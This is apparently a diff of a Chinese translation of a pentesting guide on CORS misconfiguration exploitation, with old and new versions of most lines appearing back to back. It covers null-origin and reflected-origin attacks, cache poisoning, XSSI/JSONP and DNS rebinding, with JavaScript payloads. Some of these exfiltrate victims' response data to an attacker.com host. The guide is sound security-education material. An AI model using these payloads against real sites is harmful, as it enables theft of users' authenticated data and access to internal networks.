| `http://normal-website.com/example/` | 是:相同的协议、域名和端口 |
| `http://normal-website.com/example2/` | 是:相同的协议、域名和端口 |
| `https://normal-website.com/example/` | 否:不同的协议和端口 |
| `http://en.normal-website.com/example/` | 否:不同的域名 |
| `http://www.normal-website.com/example/` | 否:不同的域名 |
| `http://normal-website.com:8080/example/` | 否:不同的端口\* |
\*Internet Explorer忽略端口号以执行同源策略,因此允许此访问。
\*Internet Explorer 在执行同源策略时忽略端口号,因此允许此访问。
### `Access-Control-Allow-Origin`
### `Access-Control-Allow-Origin`
此头部可以允许**多个来源**、一个**`null`**值,或一个通配符**`*`**。然而,**没有浏览器支持多个来源**,并且使用通配符`*`受到**限制**。(通配符必须单独使用,不允许与`Access-Control-Allow-Credentials: true`一起使用。)
此头可以允许 **多个源**、**`null`** 值或通配符 **`*`**。然而,**没有浏览器支持多个源**,并且使用通配符 `*` 受到 **限制**。(通配符必须单独使用,且与 `Access-Control-Allow-Credentials: true` 一起使用是不允许的。)
此头是**由服务器发出**,以响应网站发起的跨域资源请求,浏览器会自动添加一个`Origin`头部
此头是 **由服务器发出**,以响应网站发起的跨域资源请求,浏览器会自动添加 `Origin`
### `Access-Control-Allow-Credentials`
### `Access-Control-Allow-Credentials`
**默认情况下**,跨源请求不会携带像cookie或Authorization头部这样的凭据。然而跨域服务器可以通过将`Access-Control-Allow-Credentials`头部设置为**`true`**来允许在发送凭据时读取响应。
**默认情况下**,跨源请求是在没有凭据(如 cookies 或 Authorization 头)的情况下进行的。然而,跨域服务器可以通过将 `Access-Control-Allow-Credentials` 头设置为 **`true`** 来允许在发送凭据时读取响应。
如果设置为`true`浏览器将传输凭据cookie、授权头或TLS客户端证书
如果设置为 `true`浏览器将传输凭据cookies、授权头或 TLS 客户端证书)。
```javascript
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
@ -78,13 +79,13 @@ xhr.send('<person><name>Arun</name></person>');
### 理解跨域通信中的预检请求
在特定条件下发起跨域请求,比如使用**非标准的 HTTP 方法**(除了 HEAD、GET、POST 之外的任何方法)、引入新的**头部**,或者使用特殊的**Content-Type 头部值**,可能需要进行预检请求。这个初步请求利用**`OPTIONS`**方法,用来告知服务器即将到来的跨域请求的意图,包括打算使用的 HTTP 方法和头部。
在特定条件下发起跨域请求时,例如使用 **非标准 HTTP 方法**(除了 HEAD、GET、POST 以外的任何方法)、引入新的 **头部**,或使用特殊的 **Content-Type 头部值**,可能需要进行预检请求。这个初步请求利用 **`OPTIONS`** 方法,旨在通知服务器即将到来的跨源请求的意图,包括它打算使用的 HTTP 方法和头部。
**跨域资源共享CORS**协议规定了这种预检查,以确定请求的跨域操作的可行性,通过验证允许的方法、头部以及来源的可信度。要详细了解哪些条件可以避免需要进行预检请求,请参考[**Mozilla 开发者网络MDN**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests)提供的全面指南。
**跨源资源共享 (CORS)** 协议要求进行此预检检查,以确定请求的跨源操作的可行性,通过验证允许的方法、头部和来源的可信度。有关哪些条件可以绕过预检请求的详细理解,请参考 [**Mozilla 开发者网络 (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple\_requests) 提供的综合指南。
需要注意的是,**缺少预检请求并不意味着响应不需要携带授权头部**。没有这些头部,浏览器将无法处理来自跨请求的响应。
需要注意的是,**缺少预检请求并不意味着响应不需要携带授权头部**。没有这些头部,浏览器将无法处理来自跨请求的响应。
考虑下面这个旨在使用`PUT`方法和自定义头部`Special-Request-Header`的预检请求示例
考虑以下示例,展示了一个旨在使用 `PUT` 方法和名为 `Special-Request-Header` 的自定义头部的预检请求
```
OPTIONS /info HTTP/1.1
Host: example2.com
@ -93,7 +94,7 @@ Origin: https://example.com
Access-Control-Request-Method: POST
Access-Control-Request-Headers: Authorization
```
在响应中,服务器可能会返回指示接受的方法、允许的来源以及其他 CORS 策略细节的标头,如下所示:
在响应中,服务器可能会返回指示接受的方法、允许的来源和其他CORS政策细节的头部,如下所示:
```markdown
HTTP/1.1 204 No Content
...
@ -103,22 +104,22 @@ Access-Control-Allow-Headers: Authorization
Access-Control-Allow-Credentials: true
Access-Control-Max-Age: 240
```
* **`Access-Control-Allow-Headers`**: 该标头指定了实际请求中可以使用哪些标头。服务器设置此标头以指示来自客户端的请求中允许的标头
* **`Access-Control-Expose-Headers`**: 通过此标头,服务器通知客户端除了简单响应标头之外哪些标头可以作为响应的一部分公开
* **`Access-Control-Max-Age`**: 该标头指示预检请求的结果可以被缓存多长时间。服务器设置预检请求返回的信息可以被重用的最长时间(以秒为单位)。
* **`Access-Control-Request-Headers`**: 在预检请求中使用,此头由客户端设置,以通知服务器客户端希望在实际请求中使用哪些 HTTP头。
* **`Access-Control-Request-Method`**: 该标头也在预检请求中使用,由客户端设置以指示实际请求中将使用的 HTTP 方法。
* **`Origin`**: 该标头由浏览器自动设置,指示跨源请求的来源。服务器使用它来评估根据 CORS 策略是否应允许或拒绝传入请求。
* **`Access-Control-Allow-Headers`**: 此头部指定在实际请求中可以使用哪些头部。它由服务器设置,以指示来自客户端的请求中允许的头部
* **`Access-Control-Expose-Headers`**: 通过此头部,服务器通知客户端哪些头部可以作为响应的一部分被暴露,除了简单的响应头部
* **`Access-Control-Max-Age`**: 此头部指示预检请求的结果可以被缓存多长时间。服务器设置预检请求返回的信息可以重用的最大时间(以秒为单位)。
* **`Access-Control-Request-Headers`**: 在预检请求中使用,此头由客户端设置以通知服务器客户端希望在实际请求中使用哪些HTTP头
* **`Access-Control-Request-Method`**: 此头部也在预检请求中使用由客户端设置以指示在实际请求中将使用哪个HTTP方法。
* **`Origin`**: 此头部由浏览器自动设置指示跨源请求的来源。服务器使用它来评估根据CORS策略是否应允许或拒绝传入请求。
请注意,通常(取决于内容类型和设置的标头),在 **GET/POST 请求中不会发送预检请求**(请求会 **直接** 发送),但如果要访问响应的 **标头/主体**,它必须包含一个允许的 _Access-Control-Allow-Origin_ 头。\
**因此CORS 不能防御 CSRF但可能有所帮助)。**
请注意,通常情况下(取决于内容类型和设置的头部)在**GET/POST请求中不会发送预检请求**(请求是**直接**发送的),但如果您想访问**响应的头部/主体**,它必须包含一个允许的 _Access-Control-Allow-Origin_。\
**因此CORS并不能防止CSRF但它可能有帮助)。**
### **本地网络请求预检请求**
1. **`Access-Control-Request-Local-Network`**: 此标头包含在客户端请求中,表示查询针对本地网络资源。它作为一个标记,通知服务器请求源自本地网络。
2. **`Access-Control-Allow-Local-Network`**: 作为响应,服务器使用此标头来传达所请求资源允许与本地网络之外的实体共享。它充当资源跨不同网络边界共享的绿灯,确保在维护安全协议的同时控制访问。
1. **`Access-Control-Request-Local-Network`**: 此头部包含在客户端的请求中,以表明该请求是针对本地网络资源的。它作为一个标记,通知服务器请求源自本地网络
2. **`Access-Control-Allow-Local-Network`**: 作为响应,服务器使用此头部来传达请求的资源被允许与本地网络外的实体共享。它作为跨不同网络边界共享资源的绿灯,确保在维护安全协议的同时实现受控访问。
**允许本地网络请求的有效响应** 还需要在响应中包含`Access-Controls-Allow-Local_network: true`
一个**有效的响应允许本地网络请求**还需要在响应中包含头 `Access-Controls-Allow-Local_network: true` :
```
HTTP/1.1 200 OK
...
@ -130,22 +131,22 @@ Content-Length: 0
...
```
{% hint style="warning" %}
请注意Linux **0.0.0.0** IP 地址可用于**绕过**这些要求,以访问本地主机,因为该 IP 地址不被视为“本地”。
注意linux **0.0.0.0** IP 可以用来 **绕过** 这些要求以访问 localhost,因为该 IP 地址不被视为“本地”。
如果使用**本地端点的公共 IP 地址**(如路由器的公共 IP 地址),也可以**绕过本地网络要求**。因为在多种情况下,即使正在访问**公共 IP**,如果是**来自本地网络**,访问也将被授予
如果使用 **本地端点的公共 IP 地址**(如路由器的公共 IP也可以 **绕过本地网络要求**。因为在多种情况下,即使正在访问 **公共 IP**,如果是 **来自本地网络**也会被允许访问。
{% endhint %}
## 可利用的配置错误
## 可利用的错误配置
观察到将 `Access-Control-Allow-Credentials` 设置为**`true`**是大多数**真实攻击**的先决条件。此设置允许浏览器发送凭据并读取响应,增强了攻击的有效性。如果没有这一设置,让浏览器发出请求而不是自己发出请求的好处将减弱,因为利用用户的 cookie 将变得不可行。
观察到将 `Access-Control-Allow-Credentials` 设置为 **`true`** 是大多数 **真实攻击** 的前提条件。此设置允许浏览器发送凭据并读取响应,从而增强攻击的有效性。如果没有这个,浏览器发出请求的好处就会减少,因为利用用户的 cookies 变得不可行。
### 异常情况:利用网络位置作为身份验
### 例外:利用网络位置作为认
存在一种异常情况,即受害者的网络位置充当身份验证形式。这允许利用受害者的浏览器作为代理,绕过基于 IP 的身份验证以访问内部网络应用程序。这种方法在影响上与 DNS 重绑定类似,但更容易利用。
存在一个例外情况,即受害者的网络位置作为一种认证形式。这允许受害者的浏览器作为代理使用,绕过基于 IP 的认证以访问内网应用程序。这种方法在影响上与 DNS 重新绑定相似,但更容易利用。
### 在 `Access-Control-Allow-Origin` 中反射 `Origin`
### `Origin` `Access-Control-Allow-Origin`反射
实际情况中,`Origin` 标头的值在 `Access-Control-Allow-Origin` 中反映的情况在理论上是不太可能的,因为这些标头的组合受到限制。然而,寻求为多个 URL 启用 CORS 的开发人员可能通过复制 `Origin` 标头的值来动态生成 `Access-Control-Allow-Origin` 标头。这种方法可能会引入漏洞,特别是当攻击者使用一个旨在看起来合法的域名时,从而欺骗验证逻辑。
在现实场景中,`Origin` 头的值反射在 `Access-Control-Allow-Origin` 中在理论上是不太可能的,因为对这些头的组合有限制。然而,寻求为多个 URL 启用 CORS 的开发者可能会通过复制 `Origin` 头的值动态生成 `Access-Control-Allow-Origin` 头。这种方法可能引入漏洞,特别是当攻击者使用一个看似合法的域名时,从而欺骗验证逻辑。
```html
<script>
var req = new XMLHttpRequest();
@ -160,7 +161,7 @@ location='/log?key='+this.responseText;
```
### 利用 `null` Origin
`null` origin 被指定用于重定向或本地 HTML 文件等情况,具有独特的位置。一些应用程序将此 origin 加入白名单以促进本地开发,无意中允许任何网站通过一个沙盒 iframe 模仿 `null` origin从而绕过 CORS 限制。
`null` origin,指定用于重定向或本地 HTML 文件等情况,具有独特的地位。一些应用程序将此 origin 列入白名单以便于本地开发,无意中允许任何网站通过沙盒 iframe 模仿 `null` origin从而绕过 CORS 限制。
```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
@ -188,21 +189,21 @@ location='https://attacker.com//log?key='+encodeURIComponent(this.responseText);
```
### 正则表达式绕过技术
遇到域名白名单时,测试绕过机会至关重要,例如将攻击者的域名附加到白名单域名中或利用子域接管漏洞。此外,用于域验证的正则表达式可能会忽略域命名约定中的细微差别,从而提供进一步的绕过机会。
遇到域名白名单时,测试绕过机会至关重要,例如将攻击者的域名附加到白名单域名或利用子域名接管漏洞。此外,用于域名验证的正则表达式可能会忽视域名命名规则中的细微差别,从而提供进一步的绕过机会。
### 高级正则表达式绕过
正则表达式模式通常集中在字母数字、点(.)和连字符(-)字符上,忽略了其他可能性。例如,精心设计的域名可能包含浏览器和正则表达式模式以不同方式解释的字符,从而绕过安全检查。 Safari、Chrome 和 Firefox 对子域中下划线字符的处理展示了这种差异如何被利用以规避域验证逻辑。
正则表达式模式通常集中于字母数字、点 (.) 和连字符 (-) 字符忽略其他可能性。例如构造一个包含浏览器和正则表达式模式以不同方式解释的字符的域名可以绕过安全检查。Safari、Chrome 和 Firefox 对子域名中下划线字符的处理说明了如何利用这些差异来规避域名验证逻辑。
**有关此绕过检查的更多信息和设置:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **和** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
![https://miro.medium.com/v2/resize:fit:720/format:webp/1\*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (284).png>)
### 来自子域内的 XSS
### 从子域名中的 XSS
开发人员经常实施防御机制来防止 CORS 利用,方法是列出允许请求信息的域名白名单。尽管采取了这些预防措施,但系统的安全性并非绝对。即使在白名单域中存在一个易受攻击的子域,也可能通过其他漏洞(如 XSS 跨站脚本攻击)打开 CORS 利用的大门。
开发人员通常实施防御机制,以通过白名单允许请求信息的域名来保护免受 CORS 利用。尽管采取了这些预防措施,但系统的安全性并非万无一失。在白名单域名中,即使存在一个脆弱的子域名,也可能通过其他漏洞(如 XSS跨站脚本)打开 CORS 利用的大门。
举例说明,考虑这样一个场景:域名 `requester.com` 被列入白名单,以访问另一个域名 `provider.com` 的资源。服务器端配置可能如下所示:
例如,考虑一个场景,其中域名 `requester.com` 被列入白名单以访问另一个域名 `provider.com` 的资源。服务器端配置可能如下所示:
```javascript
if ($_SERVER['HTTP_HOST'] == '*.requester.com') {
// Access data
@ -210,15 +211,15 @@ if ($_SERVER['HTTP_HOST'] == '*.requester.com') {
// Unauthorized access
}
```
在这个设置中,允许`requester.com`的所有子域名访问。然而,如果一个子域名,比如`sub.requester.com`存在XSS漏洞攻击者可以利用这个弱点。例如能够访问`sub.requester.com`的攻击者可以利用XSS漏洞绕过CORS策略恶意访问`provider.com`上的资源。
在这个设置中,`requester.com` 的所有子域都被允许访问。然而,如果一个子域,比如 `sub.requester.com`,存在 XSS 漏洞,攻击者可以利用这个弱点。例如,拥有 `sub.requester.com` 访问权限的攻击者可以利用 XSS 漏洞绕过 CORS 策略,恶意访问 `provider.com` 上的资源。
### **服务器端缓存毒**
### **服务器端缓存毒**
[**来自这项研究**](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
通过利用HTTP头注入来实施服务器端缓存投毒可能会导致存储的跨站脚本XSS漏洞被诱发。当应用程序未对`Origin`头部进行非法字符的清理时特别是对于Internet Explorer和Edge用户就会出现这种情况。这些浏览器将(0x0d)视为合法的HTTP头终止符从而导致HTTP头注入漏洞。
通过 HTTP 头注入利用服务器端缓存中毒,可能会诱发存储的跨站脚本 (XSS) 漏洞。当应用程序未能清理 `Origin` 头中的非法字符时,这种情况就会发生,特别是对 Internet Explorer 和 Edge 用户而言。这些浏览器将 (0x0d) 视为合法的 HTTP 头终止符,从而导致 HTTP 头注入漏洞。
考虑以下请求,其中操纵了`Origin`头部
考虑以下请求,其中 `Origin` 头被操纵
```
GET / HTTP/1.1
Origin: z[0x0d]Content-Type: text/html; charset=UTF-7
@ -229,23 +230,23 @@ HTTP/1.1 200 OK
Access-Control-Allow-Origin: z
Content-Type: text/html; charset=UTF-7
```
直接利用这个漏洞通过让 web 浏览器发送一个格式错误的标头来进行攻击是不可行的,但可以使用诸如 Burp Suite 等工具手动生成一个精心构造的请求。这种方法可能会导致服务器端缓存保存响应并无意中将其提供给其他人。精心构造的有效负载旨在将页面的字符集更改为 UTF-7这是一种与 XSS 漏洞经常相关联的字符编码,因为它能够以一种可以在某些上下文中执行为脚本的方式对字符进行编码
虽然通过使网络浏览器发送格式错误的头部直接利用此漏洞并不可行,但可以使用像 Burp Suite 这样的工具手动生成一个精心制作的请求。此方法可能导致服务器端缓存保存响应,并无意中将其提供给其他人。精心制作的有效载荷旨在将页面的字符集更改为 UTF-7这是一种字符编码通常与 XSS 漏洞相关,因为它能够以某种方式编码字符,使其在特定上下文中可以作为脚本执行
有关存储型 XSS 漏洞的更多信息,请参阅[PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored)。
有关存储型 XSS 漏洞的进一步阅读,请参见 [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored)。
**注意**:利用 HTTP 头注入漏洞,特别是通过服务器端缓存毒,强调了验证和清理所有用户提供的输入(包括 HTTP 头)的重要性。始终采用包括输入验证在内的强大安全模型以防止此类漏洞。
**注意**:利用 HTTP 头注入漏洞,特别是通过服务器端缓存毒,强调了验证和清理所有用户提供的输入(包括 HTTP 头)的重要性。始终采用包括输入验证在内的强大安全模型以防止此类漏洞。
### **客户端缓存毒**
### **客户端缓存毒**
[**来自这项研究**](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
在这种情况下,观察到一个网页实例在没有适当编码的情况下反映了自定义 HTTP 标头的内容。具体来说,该网页反映了包含在 `X-User-id` 标头中的内容,其中可能包含恶意 JavaScript正如示例中标头包含一个 SVG 图像标签,旨在在加载时执行 JavaScript 代码。
在这种情况下,观察到一个网页实例反映了未正确编码的自定义 HTTP 头的内容。具体而言,网页反映了包含在 `X-User-id` 头中的内容,这可能包括恶意 JavaScript如示例所示其中头部包含一个 SVG 图像标签,旨在在加载时执行 JavaScript 代码。
域资源共享CORS策略允许发送自定义标头。然而由于 CORS 限制而未直接由浏览器呈现响应,这种注入的效用可能似乎有限。关键点在于考虑浏览器的缓存行为。如果未指定 `Vary: Origin` 标头,则可能会导致浏览器缓存恶意响应。随后,当导航到 URL 时,这个缓存的响应可能会直接呈现,绕过对初始请求的直接呈现的需求。这种机制通过利用客户端缓存增强了攻击的可靠性。
源资源共享 (CORS) 策略允许发送自定义头部。然而,由于 CORS 限制,响应未被浏览器直接呈现,这种注入的实用性似乎有限。关键点在于考虑浏览器的缓存行为。如果未指定 `Vary: Origin` 头,则恶意响应可能会被浏览器缓存。随后,当导航到该 URL 时,这个缓存的响应可能会被直接呈现,绕过初始请求时直接呈现的需要。此机制通过利用客户端缓存增强了攻击的可靠性。
为了说明这种攻击,提供了一个 JavaScript 示例,旨在在网页环境中执行,比如通过 JSFiddle。这个脚本执行一个简单的操作它向指定 URL 发送一个包含恶意 JavaScript 的自定义标头的请求。在成功完成请求后,它尝试导航到目标 URL如果响应已被缓存而没有正确处理 `Vary: Origin` 标头,则可能触发注入脚本的执行。
为了说明此攻击,提供了一个 JavaScript 示例,旨在在网页环境中执行,例如通过 JSFiddle。该脚本执行一个简单的操作它向指定的 URL 发送一个包含恶意 JavaScript 的自定义头的请求。在请求成功完成后,它尝试导航到目标 URL如果响应在未正确处理 `Vary: Origin` 头的情况下被缓存,可能会触发注入脚本的执行。
以下是用于执行此攻击的 JavaScript 的要分解:
以下是用于执行此攻击的 JavaScript 的要分解:
```html
<script>
function gotcha() { location=url }
@ -257,110 +258,111 @@ req.setRequestHeader("X-Custom-Header", "<svg/onload=alert(1)>");
req.send();
</script>
```
## 绕过
## Bypass
### XSSI (跨站点脚本包含) / JSONP
### XSSI (Cross-Site Script Inclusion) / JSONP
XSSI也称为跨站脚本包含,是一种利用脚本标签包含资源时同源策略SOP不适用的漏洞类型。这是因为脚本需要能够从不同包含。这种漏洞允许攻击者访问和读取使用脚本标签包含的任何内容。
XSSI也称为跨站脚本包含是一种利用同源策略SOP在使用脚本标签包含资源时不适用的漏洞。这是因为脚本需要能够从不同域包含。这种漏洞允许攻击者访问和读取任何通过脚本标签包含的内容。
当涉及到动态JavaScript或JSONP带填充的JSON特别是当使用像 cookies 这样的环境权限信息进行身份验证时,这种漏洞变得特别重要。当从不同主机请求资源时cookies 会被包含,使它们对攻击者可访问。
当涉及到动态JavaScript或JSONP带填充的JSON这种漏洞尤其重要,特别是当使用像cookies这样的环境权限信息进行身份验证时。当从不同主机请求资源时cookies会被包含使攻击者可访问。
为了更好地理解和减轻这种漏洞,您可以使用 [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp) 上提供的 BurpSuite 插件。该插件可以帮助识别和解决您的 Web 应用程序中潜在的 XSSI 漏洞。
为了更好地理解和缓解这种漏洞,您可以使用可在[https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp)找到的BurpSuite插件。该插件可以帮助识别和解决您Web应用程序中的潜在XSSI漏洞。
[**在此处阅读有关不同类型 XSSI 及如何利用它们的更多信息。**](xssi-cross-site-script-inclusion.md)
[**在这里阅读有关不同类型的XSSI及其利用方式的更多信息。**](xssi-cross-site-script-inclusion.md)
尝试在请求中添加一个 **`callback`** **参数**。也许页面已准备将数据发送为 JSONP。在这种情况下页面将以 `Content-Type: application/javascript` 返回数据,从而绕过 CORS 策略。
尝试在请求中添加一个**`callback`** **参数**。也许页面准备将数据作为JSONP发送。在这种情况下页面将以`Content-Type: application/javascript`返回数据从而绕过CORS策略。
![](<../.gitbook/assets/image (856).png>)
### 简单(无用?)绕过
### Easy (useless?) bypass
绕过 `Access-Control-Allow-Origin` 限制的一种方法是请求 Web 应用程序代表您发出请求并返回响应。然而,在这种情况下,由于请求是发送到不同的域,最终受害者的凭据不会被发送
绕过`Access-Control-Allow-Origin`限制的一种方法是请求Web应用程序代表您发出请求并发送回响应。然而在这种情况下最终受害者的凭据不会被发送因为请求是发往不同的域
1. [**CORS-escape**](https://github.com/shalvah/cors-escape):该工具提供了一个代理,转发您的请求及其标头,同时欺骗 Origin 标头以匹配请求的域。这有效地绕过了 CORS 策略。以下是使用 XMLHttpRequest 的示例用法
2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape):该工具提供了另一种代理请求的替代方法。服务器不会原样传递您的请求,而是使用指定的参数发出自己的请求。
1. [**CORS-escape**](https://github.com/shalvah/cors-escape):该工具提供一个代理转发您的请求及其头同时伪造Origin头以匹配请求的域。这有效地绕过了CORS政策。以下是使用XMLHttpRequest的示例
2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape):该工具提供了一种替代的请求代理方法。服务器不是直接传递您的请求,而是使用指定的参数发出自己的请求。
### Iframe + Popup 绕过
### Iframe + Popup Bypass
您可以通过**创建一个 iframe****然后从中打开一个新窗口**来**绕过 CORS 检查**,例如 `e.origin === window.origin`。有关更多信息,请参阅以下页面:
您可以通过**创建一个iframe**并**从中打开一个新窗口**来**绕过CORS检查**,例如`e.origin === window.origin`。更多信息请参见以下页面:
{% content-ref url="xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
[iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
{% endcontent-ref %}
### 通过 TTL 进行 DNS 重绑定
### DNS Rebinding via TTL
通过 TTL 进行 DNS 重绑定是一种绕过某些安全措施的技术,方法是操纵 DNS 记录。其工作原理如下:
通过TTL进行DNS重绑定是一种通过操纵DNS记录来绕过某些安全措施的技术。其工作原理如下:
1. 攻击者创建一个网页使受害者访问它。
2. 然后,攻击者更改自己域的 DNSIP指向受害者的网页。
3. 受害者的浏览器缓存 DNS 响应,其中可能有 TTL生存时间指示 DNS 记录应被视为有效的时间。
4. 当 TTL 到期时,受害者的浏览器会发出新的 DNS 请求,允许攻击者在受害者的页面上执行 JavaScript 代码。
5. 通过控制受害者的 IP攻击者可以从受害者那里获取信息而无需向受害者服务器发送任何 cookies
1. 攻击者创建一个网页使受害者访问它。
2. 攻击者然后更改其域的DNSIP指向受害者的网页。
3. 受害者的浏览器缓存DNS响应可能有TTL生存时间指示DNS记录应被视为有效的时间。
4. 当TTL过期时受害者的浏览器发出新的DNS请求允许攻击者在受害者的页面上执行JavaScript代码。
5. 通过保持对受害者IP的控制攻击者可以在不向受害者服务器发送任何cookies的情况下收集受害者的信息
需要注意的是,浏览器具有缓存机制,即使 TTL 值较低,也可能阻止立即滥用此技术。
需要注意的是,浏览器具有缓存机制,可能阻止立即滥用此技术即使TTL值较低
DNS 重绑定可用于绕过受害者执行的显式 IP 检查,或者用于用户或机器人在同一页面停留较长时间的情况,从而使缓存过期。
DNS重绑定对于绕过受害者执行的显式IP检查或用户或机器人在同一页面上停留较长时间的场景非常有用从而允许缓存过期。
如果您需要快速滥用 DNS 重绑定,可以使用 [https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html) 等服务。
如果您需要快速滥用DNS重绑定可以使用像[https://lock.cmpxchg8b.com/rebinder.html](https://lock.cmpxchg8b.com/rebinder.html)这样的服务。
要运行自己的 DNS 重绑定服务器,您可以利用 **DNSrebinder** ([https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)) 等工具。这涉及暴露本地端口 53/udp创建指向它的 A 记录例如ns.example.com并创建指向先前创建的 A 子域的 NS 记录例如ns.example.com。然后ns.example.com 子域的任何子域都将由您的主机解析。
要运行自己的DNS重绑定服务器您可以使用像**DNSrebinder**[https://github.com/mogwailabs/DNSrebinder](https://github.com/mogwailabs/DNSrebinder)这样的工具。这涉及到暴露您的本地端口53/udp创建一个指向它的A记录例如ns.example.com并创建一个指向先前创建的A子域的NS记录例如ns.example.com。ns.example.com子域的任何子域将由您的主机解析。
您还可以在 [http://rebind.it/singularity.html](http://rebind.it/singularity.html) 上探索一个公开运行的服务器,以进一步了解和实验。
您还可以访问[http://rebind.it/singularity.html](http://rebind.it/singularity.html)上的公共运行服务器以进一步理解和实验。
### 通过 **DNS 缓存洪泛** 进行 DNS 重绑定
### DNS Rebinding via **DNS Cache Flooding**
通过 DNS 缓存洪泛进行 DNS 重绑定是另一种绕过浏览器缓存机制并强制进行第二个 DNS 请求的技术。其工作原理如下:
通过DNS缓存洪水进行DNS重绑定是另一种用于绕过浏览器缓存机制并强制第二个DNS请求的技术。其工作原理如下:
1. 最初,当受害者发出 DNS 请求时,会收到攻击者的 IP 地址作为响应
2. 为了绕过缓存防御,攻击者利用服务工作者。服务工作者会洪泛 DNS 缓存,有效地删除了缓存的攻击者服务器名称。
3. 当受害者的浏览器发出第二个 DNS 请求时,现在会收到 IP 地址 127.0.0.1,通常指向本地主机。
1. 最初,当受害者发出DNS请求时响应为攻击者的IP地址
2. 为了绕过缓存防御,攻击者利用服务工作者。服务工作者洪水式地填充DNS缓存有效地删除了缓存的攻击者服务器名称。
3. 当受害者的浏览器发出第二个DNS请求时现在响应为IP地址127.0.0.1,这通常指的是本地主机。
通过使用服务工作者洪泛 DNS 缓存,攻击者可以操纵 DNS 解析过程,并迫使受害者的浏览器发出第二个请求,这次解析为攻击者所需的 IP 地址。
通过使用服务工作者洪水填充DNS缓存攻击者可以操纵DNS解析过程并强制受害者的浏览器发出第二个请求这次解析为攻击者所需的IP地址。
### 通过 **缓存** 进行 DNS 重绑定
### DNS Rebinding via **Cache**
绕过缓存防御的另一种方法是利用 DNS 提供商为同一子域提供多个 IP 地址。其工作原理如下:
绕过缓存防御的另一种方法是利用DNS提供商中同一子域的多个IP地址。其工作原理如下:
1. 攻击者为 DNS 提供商的同一子域设置两个 A 记录(或一个具有两个 IP 的 A 记录)。
2. 当浏览器检查这些记录时,会收到两个 IP 地址。
3. 如果浏览器决定首先使用攻击者的 IP 地址,攻击者可以提供执行 HTTP 请求到同一域的有效载荷
4. 但是,一旦攻击者获得受害者的 IP 地址,他们将停止响应受害者的浏览器。
5. 当受害者的浏览器意识到域名无响应时,会继续使用给定的第二个 IP 地址。
6. 通过访问第二个 IP 地址浏览器绕过了同源策略SOP允许攻击者滥用此功能并获取和外泄信息。
1. 攻击者在DNS提供商中为同一子域设置两个A记录或一个具有两个IP的A记录)。
2. 当浏览器检查这些记录时,它接收到两个IP地址。
3. 如果浏览器决定首先使用攻击者的IP地址攻击者可以提供一个有效载荷执行对同一域的HTTP请求
4. 然而一旦攻击者获得受害者的IP地址他们就停止响应受害者的浏览器。
5. 受害者的浏览器在意识到该域无响应后转而使用第二个给定的IP地址。
6. 通过访问第二个IP地址浏览器绕过同源策略SOP允许攻击者滥用这一点并收集和外泄信息。
该技术利用了浏览器在为域提供多个 IP 地址时的行为。通过策略性地控制响应并操纵浏览器选择的 IP 地址,攻击者可以利用 SOP 并从受害者那里访问信息。
该技术利用了浏览器在为域提供多个IP地址时的行为。通过战略性地控制响应并操纵浏览器的IP地址选择攻击者可以利用SOP并访问受害者的信息。
{% hint style="warning" %}
请注意,为了访问 localhost您应尝试在 Windows 中重新绑定 **127.0.0.1**,在 Linux 中重新绑定 **0.0.0.0**。\
godaddy 或 cloudflare 这样的提供商不允许我使用 IP 0.0.0.0,但 AWS route53 允许我创建一个具有 2 个 IP 的 A 记录,其中一个是 "0.0.0.0"
请注意为了访问localhost您应尝试在Windows中重新绑定**127.0.0.1**在Linux中重新绑定**0.0.0.0**。\
godaddy或cloudflare这样的提供商不允许我使用IP 0.0.0.0但AWS route53允许我创建一个具有两个IP的A记录其中一个是"0.0.0.0"
<img src="../.gitbook/assets/image (140).png" alt="" data-size="original">
{% endhint %}
有关更多信息,请查看 [https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
### 其他常见绕过方式
有关更多信息,您可以查看[https://unit42.paloaltonetworks.com/dns-rebinding/](https://unit42.paloaltonetworks.com/dns-rebinding/)
* 如果**不允许内部IP**,可能会**忘记禁止0.0.0.0**适用于Linux和Mac
* 如果**不允许内部IP**,可以响应一个**CNAME**到**localhost**适用于Linux和Mac
* 如果**不允许内部IP**作为DNS响应可以响应**CNAME到内部服务**如www.corporate.internal。
### Other Common Bypasses
### 武器化的DNS Rebinding
* 如果**不允许内部IP**,他们可能**忘记禁止0.0.0.0**在Linux和Mac上有效
* 如果**不允许内部IP**,则响应**CNAME**到**localhost**在Linux和Mac上有效
* 如果**不允许内部IP**作为DNS响应您可以响应**CNAME到内部服务**例如www.corporate.internal。
您可以在演讲[Gerald Doussot - DNS Rebinding攻击的现状和起源的独特性 - DEF CON 27大会](https://www.youtube.com/watch?v=y9-0lICNjOQ)中找到有关先前绕过技术以及如何使用以下工具的更多信息。
### DNS Rebidding Weaponized
[**`起源的独特性`**](https://github.com/nccgroup/singularity)是一个用于执行[DNS Rebinding](https://en.wikipedia.org/wiki/DNS\_rebinding)攻击的工具。它包括重新绑定攻击服务器DNS名称的IP地址到目标机器的IP地址以及提供攻击载荷以利用目标机器上的易受攻击软件所需的组件
